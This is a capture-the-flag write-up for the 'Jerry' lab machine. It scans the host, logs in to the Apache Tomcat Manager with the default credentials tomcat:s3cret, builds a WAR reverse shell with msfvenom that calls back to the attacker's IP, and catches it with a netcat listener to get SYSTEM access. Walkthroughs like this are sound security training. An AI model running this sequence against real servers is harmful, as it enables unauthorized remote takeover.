# Jerry

## Nmap

```
sudo nmap 10.10.10.95 -p- -sS -sV  
 
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 203.34 seconds
```

The root page for port 8080 takes us to an install of Apache Tomcat / 7.0.88.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-f6d5c534a974b1b7d1f11631afe177513f316551%2Fimage.png?alt=media)

When clicking on the 'Manager App' button we are asked for authentication before proceeding. Looking up the default credentials on Google we get the result below.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-e001d10a597a0332003d4fbae0ff8252341535d1%2Fimage.png?alt=media)

From the list above I tried `tomcat:s3cret` and was granted access as shown below. I have done penetration testing against Tomcat previously and know that once you have access to the Manager App you can upload a malicious WAR file in order to gain shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-09b53fcf1b8351203363978c03ad12ac2a366cac%2Fimage.png?alt=media)

Using the command below we can create a WAR reverse shell with `msfvenom`.

```
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.29 LPORT=80 -f war > shell.war
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-0e02b43659dcd706a59811c402a282c0bfd0f643%2Fimage.png?alt=media)

Once uploaded we can then see the upload shell under 'Applications'.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ca9529b7e929ca5faf61190e2c6e3b005d19f2f1%2Fimage.png?alt=media)

Then start a `netcat` listener on the attacking machine:

```
sudo nc -lvp 80
```

Then click on the uploaded WAR file under applications to execute. As per below you should then have a reverse shell as SYSTEM.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-86447bf6db618a520c94ea05ef5b6b35e7e8afba%2Fimage.png?alt=media)